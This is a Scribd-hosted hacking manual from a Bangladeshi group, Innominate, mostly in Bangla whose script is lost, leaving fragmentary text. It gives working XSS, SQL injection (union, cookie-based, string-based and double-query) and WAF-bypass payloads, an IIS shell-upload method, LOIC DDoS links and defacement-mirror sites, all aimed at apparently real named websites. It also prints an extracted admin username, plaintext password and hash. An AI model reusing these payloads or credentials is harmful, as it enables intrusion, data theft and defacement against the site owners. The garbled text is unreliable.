Scribd
Upload
311 views

1

This document discusses Innominate, a Bangladeshi hacking group founded in 2015 to protect Bangladesh's cyber space from foreign hackers and stop bad websites. It thanks the group's founders, administrators, team members and fans. It also lists some hacking techniques like SQL injection, XSS, IIS exploits and tools like Tor browser and cookie-based hacking.

Uploaded by

David Mart
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
311 views

1

This document discusses Innominate, a Bangladeshi hacking group founded in 2015 to protect Bangladesh's cyber space from foreign hackers and stop bad websites. It thanks the group's founders, administrators, team members and fans. It also lists some hacking techniques like SQL injection, XSS, IIS exploits and tools like Tor browser and cookie-based hacking.

Uploaded by

David Mart
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 91

Founder : Rajib Hasan

Greatz
All Bangladeshi & Muslim Hackers
My Boss : Faruk Ahmed
Ismail Ahmed,#Virus_Rom,Redwan Ali Rafi
Blind Coder,Murkho Balok, Farhan Sajid,Fayaze
Modern Einstein,Infected Brain,Cyber Dark,Robi Ahsan
Rakibul Hasan,
All Bangladeshi Blogger and Tunerpage and Techtunes
And All Admin,Crew,Team Members Of Innominate
Also Thanks For Support us all Fans Of Innominate
All Rights Reserved By Innominate Hacking Group
Innominate is A Hacking Group of Bangladesh . It was
Created 01-02-2015. A little boy aged 14 have founded
This Group For Protect Bangladesh Cyber Space From
Foreign Hackers and Stop Bad Website Site. We are
Also Muslim Hacker . We are United .Never Hate Us,
Just Hate Your Security.

Join

Our Official Facebook Fanpage


Our Official Facebook Group
Our Offical Ddos Squad
Official Facebook Id Of Rajib Hasan

XSS Basic Hacking .

IIS Exploit

Cookie ?

Ddos

SQL Injection Union Based

Havij Tutorial

SQLi
Mirror)

Cookie Based SQLi

String Based SQL Injection

Double Query SQL Injection Attack

Tor Browser –

Error Based Sql (bangla)

SQL injection Bypass WAF


??

White Hat Hacker)-

Grey Hat Hacker)-

(Black Hat Hacker)-

Script Kidie)-
Neophyte or nOOb)-

Blue Hat Hacker)-

Hacktivist)- , ,

Elite Hacker) ,
,
Google Dork . Dork
EPT .

/
dorks .
, Dork
.

Dork ,
.
:

: query .
filetype: pdf .
InText: resticts .

, ,
.
Dorking Google
.
Xss Method
XXS ?
Xss XSS
RUN

browser side, server side.


XSS vulnerable site google dork
Acunetix Net SPark

vulnerable URL :

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=

HTML
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<h1>XSS ATTACK</h1>
XSS ATTACK

<script>alert("XSS VULN")</script>
-

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<script>alert("XSS VULN")</script>
XSS VULN.

http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<center><img
src="http://4.bp.blogspot.com/-n4BlX1pdajg/UiNM0pmiOgI/AAAAAAAAARU/ImXazq6Eu0o/s1600/xss.jpg"
hight=800 widht=1030> </center>

<iframe src="http://www.rpd.ie/xssd.html" height 768 width=1024>


-
http://civildefence.gov.pk/dgcd2/g.php?dir=flood+relief&gallery_name=<iframe
src="http://www.rpd.ie/xssd.html" height 768 width=1024>
IIS Exploit ? ?
IIS Exploit ,

 My Computer Add a network

Location
 Next

 Next

 vuln website Next


http://www.myxixia.com/

 Next

 Finish

 Network Location Option —> website folder


 shell

http://www.ziddu.com/download/16498227/shell.zip.html

 Extract
 Power.asp;.jpg

 power.asp;.jpg

 power.asp;.jpg
http://www.myxixia.com/power.asp;.jpg
Index.asp
Uplode Option Uplode File Format Html,asp

Example : http://utivf.com/bd.html
,

one-two Pussy ?

Ass Hole 21st Century Ass hole


____" [

Bluetooth, Apple ( iphone Cookie !


Cookie

Have Some Cookie, mate ! "


Cookie hijacking, Cookie stealing Have Some Cookie"
,
! , ,

@Forhad
,
! ,
,

Cookie ? ?
Cookie , cookie ,
internet
cookie internet cookie ,
,
cookie
cookie name-value pair
Internet Explorer windows explorer
cookie cookie location C:\Documents and
Settings\User name\Local Settings C drive system32 folder directory
cookie installation directory

# Chrome cookie C:\Documents and Settings\\Local Settings\Application


Data\Google\Chrome\User Data\Default\Cookies# Firefox cookie text file
cookie location C:\Documents and Settings\Windows login\User
name\Application Data\Mozilla\Firefox\Profiles\profile folder cookie
simple cookie user id
complex cookies ~ user id~ session id ~ time for session initiation~
value login data

Cookies cookies

cookies cookies
current activity status cookies
cookies

Different types of Cookies :

cookies > Session cookie.=> Persistent cookie.

#1. Session cookie : session cookie session cookie


current information main user id.session cookie
#2. Persistent Cookie : persistent cookie cookie
persistent cookie manually expiration time
cookies authentication
fresh cookies

cookies !

First party cookies :

visit cookies
surfing personalized

Third Party Cookies : cookies advertising website google


doubleclick dart cookie) track
track

Threats from Cookies :Malicious programs, adwares, malwares cookie


malicious cookies
surfing habit
malicious cookie
flagged)

Cookie stealing ?

Cookies session data login data


system cookies

cookie stealing (the session key)

Methods of Cookie Stealing :

cookie stealing > Cross Site Scripting


(CSS/XSS)=> Session Key Stealing=> Using Packet Sniffing=> Session Fixing

[+] Cross Site Scripting (CSS/XSS) :

cookie copy
[+] Session Key Stealing :

attacker file
system session key , ,
, ,

[+] Using Packet Sniffing (session side jacking) :

read session cookie packet sniffing

[+] Session Fixing :

session id malicious link


manipulate

cookie cookie interesting take care


private information

Writter : Rizwan bin Sulaiman


-
,

, , ,

**
http://sourceforge.net/projects/loic/files/loic/loic-1.0.4/loic-1.0.4-binary.zip/download
LOIC LOIC

https://www.facebook.com/1035833389775994

Target address information

My FB: https://www.facebook.com/100004445461825
SQL INJECT

SQL INJECT
dork use

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:Pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=
inurl:gallery.php?id=

dork sql 8500 SQL dorks list

http://pastebin.com/dzknXjgP

http://pastebin.com/ayV6tNS2

dork www.google.com SEARCH

inurl:news-and-events.php?id=

dork SEARCH
http://www.eastodissa.ac.in/news-and-events.php?id=22

http://s23.postimg.org/j6z3yjv3f/Image_000.png

SQL INJECT ID

injectable

url ‗

http://www.eastodissa.ac.in/news-and-events.php?id=22'
injectable ।
―You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for
the right syntax to use near ‖‘ at line 1″

http://s12.postimg.org/3wp8e5g6l/Image_1.png

injectable inject

http://www.eastodissa.ac.in/news-and-events.php?id=22

, order+by+

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+

1
http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+1--

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+2--

http://s9.postimg.org/l6dc23yxb/Image_2.png

3,4,5 7 ।

8 SQL

( www.site.com/index.php?id=1 order 999– [ no error ] order by 999


error । — id=1 ‗ sign
www.site.com/index.php?id=1′ order by 999–+ error SQL
Injection

http://www.eastodissa.ac.in/news-and-events.php?id=22+order+by+8--
http://s16.postimg.org/89klyqsqd/Image_3.png

Could not connect to MySQL server: Unknown column ‘8′ in ‗order clause‘ ।

+union+select+1,2,3,4,5,6,7--

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,2,3,4,5,6,7--

http://s18.postimg.org/jbn2ndf6x/Image_4.png

( , news-and-events.php?id= –
2,3,

2 @@version

http://www.eastodissa.ac.in/news-and-events.php?id=-22+union+select+1,@@version,3,4,5,6,7--

http://s21.postimg.org/s9uxrndvb/Image_5.png

5.1.68-community
5 inject

group_concat(table_name)

+from+information_schema.tables+where+table_schema=database()--

http://www.eastodissa.ac.in/news-and-events.php?id=-
22+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables+where+table_schem
a=database()--

http://s12.postimg.org/s4j0a6iwd/Image_6.png

est_achievement,est_admin,est_adminlog,est_companyrecord,est_facprofile,est_news,est_notice,est_onlineappl
ication,est_placementrecord
est_achievement , est_companyrecord

est_admin

group_concat(column_name)

from information_schema.columns where table_name=


CHAR

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

F9

SQL>MySQL>MySQL CHAR()

http://s23.postimg.org/c2fx3e90r/Image_7.png
ok

http://s21.postimg.org/xlsoepaev/Image_8.png

est_admin CHAR CHAR(101, 115, 116, 95, 97, 100, 109, 105, 110)

http://www.eastodissa.ac.in/news-and-events.php?id=-
22+union+select+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_n
ame=CHAR(101,115, 116, 95, 97, 100, 109, 105, 110)--

http://s18.postimg.org/n252z8kkp/Image_9.png

est_admin CHAR
।uid,userid,password,emailid,signature,last_login

group_concat(login,0x3a,Pass,0x3a),

userId login userId


Pass password

from+est_admin--

+from+ est_admin est_admin ।

http://www.eastodissa.ac.in/news-and-events.php?id=-
22+union+select+1,group_concat(userId,0x3a,password,0x3a),3,4,5,6,7+from+est_admin--

http://s16.postimg.org/w2cat8oad/Image_10.png

trustadmin:isti$$9!5!2013:
trustadmin isti$$9!5!2013
-http://scan.subhashdasyam.com/admin-panel-finder.php

havij

MD5 www.md5decrypter.cu.uk/

http://www.youtube.com/watch?v=QuW_rSQ5_W0&feature=youtube_gdata_player

Innominate
♥♥♥ Havij SQLi ♥♥♥

Download .Havij 1.5 Pro http://www.mediafire.com/?s7a89dxmfwxcyij

Google.Com inurl:php?id="

Dork http://pastebin.com/DvnHxg7i

― 2,010,000,000 0.23 ‖
, php?id=
http://www.paulprescott.com/theme.php?id=10
ID=XX, XX

ID=10

‘)

Error , , inject “Havij”

Error ―Analyze‖ (
,
Current DB: XXXX"

“Tables” tab “Get DB’s”

“paul_third”,

“information_schema”

“information_schema” MySQL “paul_third”

“Get Tables”

administration panel “admin” table

“Get Columns”
“id”, “username” ( Username

“password” ( Password , “email” (

“Get Data” Username, Password

“Find Admin” Administration Panel login

administration panel

php?id=XX

“Path to Search” URL “Start”

Administration Panel login page Administration Panel

administration panel login

!

HTML, Java, CSS PHP


?

http://hackinseconds.files.wordpress.com/2012/01/capture.png

http://www.2shared.com/file/vLH_20xn/Advance_Deface_maker.html

Advanced Deface Creator – Updater.exe


inurl:mypage.php?page_id=
- +union+select+1,2,group_concat(name,0x3a,password)+from+login--
----------------------------------------

,
http://www.jcsjournal.com/mypage.php?page_id=51
, ,

http://www.jcsjournal.com/mypage.php?page_id=-51
-----------------------

http://www.jcsjournal.com/mypage.php?page_id=-
51+union+select+1,2,group_concat(name,0x3a,password)+from+login--
-----------------------
abcd D ?

Mirror )

P G। ,

www.Zone-h.org

www.mirror-zone.org

www.zone-hack.com

www.zone-hc.com

www.arab-zone.net

www.pak-zone.com

www.pakcybercrews.com

http://leetsmirror.com/

www.hack-mirror.com
www.zone-h.org
*

*
*

notify deface
mass

Notifier : notify । Notifier Innominate ।

Domain:

send
ok

onhold

notifier
onhold approve ।
Fake
Cookie Based SQLi SQLi

Sql Injection (Union Based)

check group Doc File https://www.facebook.com/groups/hackingworld1/

( SQLi ,

Hackbar Addon"

Cookie Manager"

Cookie Manager:

https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/

url: http://site.com/cid.php?id=3
?id=3 cid.php Url

Url

http://site.com/cid.php

Cookie Manager
http://prntscr.com/4jtmn9

http://prntscr.com/4jtnav

Cookie Manager
3 order by 1--

SQLi order by

order by 3--
union select and 0+1,2--
and 0 union select

SQLi

3 union select and 0+version(),2--


SQLi

3 union select and


0+group_concat(table_name),2+from+information_schama.tables+where+table_schema=database()

 admin
 news
 about

admin

3 union select and


0+group_concat(columnn_name),2+from+information_schama.columns+where+table_name=Hex value Of
Admin

login_user

login_password

3 union select and 0+group_concat(login_user,0x3a,login_password),2+from+admin--


String Based SQL Injection

Union Based SQLi

String Based Sql Injection Sql Injection

Sql Injection

( Sql Injection

String Based SQL Injection

"order by" doesn't work, example: order by 100--

Basic SQL SQL injection

string based sqli

Union Based String Based


SQLi

http://site.com/index.php?id=10

SQLi Url '

http://site.com/index.php?id=10'

Union Based

http://site.com/index.php?id=10 order by 10 (

order by

http://site.com/index.php?id=10 order by 1000 (

String Based SQLi

id=value '(
, ,

http://site.com/index.php?id=10' order by 10--+ (

http://site.com/index.php?id=10' order by 9--+ (still Error)

http://site.com/index.php?id=10' order by 8--+ (Error)

http://site.com/index.php?id=10' order by 7--+ (Error)


http://site.com/index.php?id=10' order by 6--+ (No Error)

http://site.com/index.php?id=-10' union select 1,2,3,4,5,6--+

SQLi

# Version Database Name Database User

group_concat(database()),concat(user(),ox3a,version "

http://site.com/index.php?id=-10' union select 1,group_concat(database()),concat(user(),ox3a,version


,3,4,5,6--+

Version ,Database Name , Database User

http://site.com/index.php?id=-10' union select 1,2,3,group_concat(table_name),5,6 from


information_schema.tables where table_schema=database()--+-
admin" admin"

admin" hex)

"admin" 0x61646d696e

http://site.com/index.php?id=-10' union select 1,2,3,group_concat(column_name),5,6 from


information_schema.columns where table_name=char(104,111,109,101,112,97,103,101,117,115,101,114,115)-
-+-

admin"

id , user , password"

http://site.com/index.php?id=-10' union select 1,2,3,group_concat(id,0x3e,user,0x3e,password),5,6 from


admin--+-

admin id,user,password
, ―union+select‖

[#] Can't findcolumns in the page source

[#]Following"SELECT" statements have different numbers of column

[#] Unknown column 1 in order case.(or 0)

DoubleQuery SQL Injection Attack

, http://target.com/detail.php?id=10 Double Query SQL


Injection

STEP1:

5
5 information_schema.tables

+or+1+group+by+concat_ws(0x7e,version(),floor(ran(0)*2))+having+min(0)+or+1--

http://www.target.com/detail.php?ID=10++or+1+group+by+concat_ws(0x7e,version(),floor(ran(0)*2))+havi
ng+min(0)+or+1--

Duplicate entry‗5.1.52-log~1‘ for key ‗group_key‘

, information_schema.tables
information_schema.tables

STEP5:
TABLE

+and+(select+1+from(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7e))+fro
m+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+from+inf
ormation_schema.tables+group+by+x)a)

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+conca
t(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+lim
it+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

limit

limit 1

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+conca
t(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+lim
it+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

limit 2

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+conca
t(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+lim
it+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

limit 3

http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+conca
t(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+lim
it+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

limit 6
http://www.example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+conca
t(cast(table_name+as+char),0x7e))+from+information_schema.tables+where+table_schema=database()+lim
it+6,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry 'tbadmin~1' for key 'group_key'

, tbadmin

STEP 6:

+and+(select+1+from(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7e))+fr
om+information_schema.columns+where+table_name=0xTABLEHEX+limit+0,1),floor(rand(0)*2))x+fro
m+information_schema.tables+group+by+x)a)

http://example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(c
olumn_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e
+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry 'adminid~1' for key 'group_key'

limit , username, password

limit 1 2 username password

limit 1

http://example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(c
olumn_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e
+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Duplicate entry 'username~1' for key 'group_key'

limit 2

http://example.com/detail.php?ID=10+and+(select+1+from(select+count(*),concat((select(select+concat(cast(c
olumn_name+as+char),0x7e))+from+information_schema.columns+where+table_name=0x74626c61646d696e
+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry ''password~1' for key 'group_key'

STEP 7:

+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(column1,0x7e,column2,0
x7e,column3)+as+char),0x7e))+from+TABLENAME+limit+0,1),floor
(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

http://example.com/detail.php?ID=10+and+(select+1+from+(select+count(*),concat((select(select+concat(ca
st(concat(adminid,0x7e,username,0x7e,password)+as+char),0x7e))+from+tbladmin+limit+0,1),floor
(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Duplicate entry '1~adminusername~adminpassword~1' for key 'group_key'


?

Tor Browser

Tor Browser Tor Browser

Tor Browser Tor

https://www.torproject.org/download/download Tor Browser ।

Run as Administrator

Tor Network
Error Based/ Double query SQL injection

sql vulnerable union select statement/firewall bypass

double query try

example:
# The Used Select Statements Have A Different Number Of Columns.
# Unknown column 1 in order clause. (or 0)
# Can't find your columns in the page source.
# Error #1604

>

www.site.com/index.php?id=1

version

www.site.com/index.php?id=1+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

id value

+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--

=>

Duplicate entry '5.5.35-0ubuntu0.12.04.2~1' for key 'group_key'

version 5.5.35 [

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1-- ]

database >

www.site.com/index.php?id=1+or+1+group+by+concat_ws(0x7e,database(),floor(rand(0)*2))+having+min(0)+or+1--
=>

Duplicate entry 'broderna~1' for key 'group_key'

database broderna [

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+or+1+group+by+concat_ws(0x7e,database(),floor(rand(0)*2))+having+min(0)+or+1--]

table name

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0
x7e))+from+information_schema.tables+where+table_schema= _ _ limit+0,1),floor(rand(0)*2))x+from+information
_schema.tables+group+by+x)a)

0x62726f6465726e61

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0
x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+0,1),floor(rand(0)*2))x+from+informa
tion_schema.tables+group+by+x)a)

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as
+char),0x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+0,1),floor(rand(0)*2))x+from
+information_schema.tables+group+by+x)a) ]

double query limit increase


limit 1,1 limit 2,1

>

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0
x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+1,1),floor(rand(0)*2))x+from+informa
tion_schema.tables+group+by+x)a)

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as
+char),0x7e))+from+information_schema.tables+where+table_schema=0x62726f6465726e61+limit+1,1),floor(rand(0)*2))x+from
+information_schema.tables+group+by+x)a) ]

limit increase users/user/admin table limit 18,1 users table


>
Duplicate entry 'users~1' for key 'group_key' [

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as
+char),0x7e))+from+information_schema.tables+where+table_schema=database()+limit+18,1),floor(rand(0)*2))x+from+informati
on_schema.tables+group+by+x)a) ]

>
www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char)
,0x7e))+from+information_schema.columns+where+table_name= _ _ limit+1,1),floor(rand(0)*2))x+from+information
_schema.tables+group+by+x)a)

users 0x7573657273 [

>
www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char)
,0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),floor(rand(0)*2))x+from+information_
schema.tables+group+by+x)a)

>
Duplicate entry 'userid~1' for key 'group_key' [

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+
as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+0,1),floor(rand(0)*2))x+from+inf
ormation_schema.tables+group+by+x)a) ]

userid limit 1,1 2,1 username password ??

so, >
www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char)
,0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1),floor(rand(0)*2))x+from+information_
schema.tables+group+by+x)a)

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+
as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1),floor(rand(0)*2))x+from+inf
ormation_schema.tables+group+by+x)a) ]

>

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char)
,0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1),floor(rand(0)*2))x+from+information_
schema.tables+group+by+x)a)
[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+
as+char),0x7e))+from+information_schema.columns+where+table_name=0x7573657273+limit+2,1),floor(rand(0)*2))x+from+inf
ormation_schema.tables+group+by+x)a) ]

username passwd [

username passwd

www.site.com/index.php?id=1+and+(select+1+from+
(select+count(*),concat((select(select+concat(cast(concat(0x7e, _ ,0x7e, _ as+char),0x7e))+from+_ _
limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

username passwd users [

=>

www.site.com/index.php?id=1+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7e,username,
0x7e,passwd)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

[ http://www.broderna-
anderssons.se/prod_detail.php?id=109+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7e,us
ername,0x7e,passwd)+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x
)a) ]

Duplicate entry '~admin~c836b87f211e2647e6c5fb3d95f98e0d~1' for key 'group_key'

admin=> admin

password => c836b87f211e2647e6c5fb3d95f98e0d


, ?

, ।

>>>http://www.tunerpage.com/archives/327156
Lets starthere is the vulnerability site we will use :)

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=117

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117 UNION SELECT 1,2,3,4,5,6,7,8,9--

cant find vuln column!IMAGE (http://www.anonmgur.com/up/f79d150bae354d151813360a601b0878.png)

Lets try bypass waf

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union /*!select*/
1,2,3,4,version(),6,7,8,9--+

Same result lets use other bypassIMAGE


(http://www.anonmgur.com/up/5fe6b5cf97820f156cfd9877ae998f06.png)

Now Solutions !

This time we can notice beside command select also all characters * are missing. All * were cut out by WAF.

Now we will use some logic. If command select is filtered out we will mask it so WAF will not detect it. And
we will "attack" WAF with its own weapon. We will use character *

and here the solution

Query:

http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union sel*ect
1,2,3,4,version(),6,7,8,9--+

OR

Query:http://www.instintocigano.com.br/artigos-de-baralho-cigano.php?id=-117+union SELselectECT
1,2,3,4,version(),6,7,8,9--+
SQLI Injction WAF Bypass Methods With Details

--'- : +--+ / : -- - : --+- : /*

) order by 1-- -

') order by 1-- -

')order by 1%23%23

%')order by 1%23%23

Null' order by 100--+

Null' order by 9999--+

')group by 99-- -

'group by 119449-- -

'group/**/by/**/99%23%23

union select ByPassing method

+union+distinct+select+

+union+distinctROW+select+

/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/

+/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+

+/*!u%6eion*/+/*!se%6cect*/+

/**/uniUNIONon/**/aALLll/**/selSELECTect/**/

1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23

/*!50000%55nIoN*/+/*!50000%53eLeCt*/

union /*!50000%53elect*/

%55nion %53elect

+--+Union+--+Select+--+

+UnIoN/*&a=*/SeLeCT/*&a=*/

id=1+’UnI”On’+'SeL”ECT’

id=1+'UnI'||'on'+SeLeCT'

UnIoN SeLeCt CoNcAt(version())--

uNiOn aLl sElEcT


uUNIONnion all sSELECTelect

==================================================================================================
=================================

:: Buffer Overflow ::

==================================================================================================
=================================

+And(select 1)=(select 0×414)+union+select+1–

+And(select 1)=(select 0xAAAA)+union+select+1–

+And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414


14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414
14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+

+and (/*!select*/ 1)=(/*!select*/ 0xAA)+

==================================================================================================
================================

:: 400 Bad Request ::

==================================================================================================
================================

–+%0A
union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –

==================================================================================================
================================

null the parameter

==================================================================================================
================================

id=-1

id=null

id=1+and+false+

id=9999

id=1 and 0

id==1

id=(-1)

==================================================================================================
=====================================

Group_Concat

==================================================================================================
=====================================

Group_Concat
group_concat()

/*!group_concat*/()

grOUp_ConCat(/*!*/,0x3e,/*!*/)

group_concat(,0x3c62723e)

g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29

CoNcAt()

CONCAT(DISTINCT Version())

concat(,0x3a,)

concat%00()

%00CoNcAt()

/*!50000cOnCat*/(/*!Version()*/)

/*!50000cOnCat*/

/**//*!12345cOnCat*/(,0x3a,)

concat_ws()
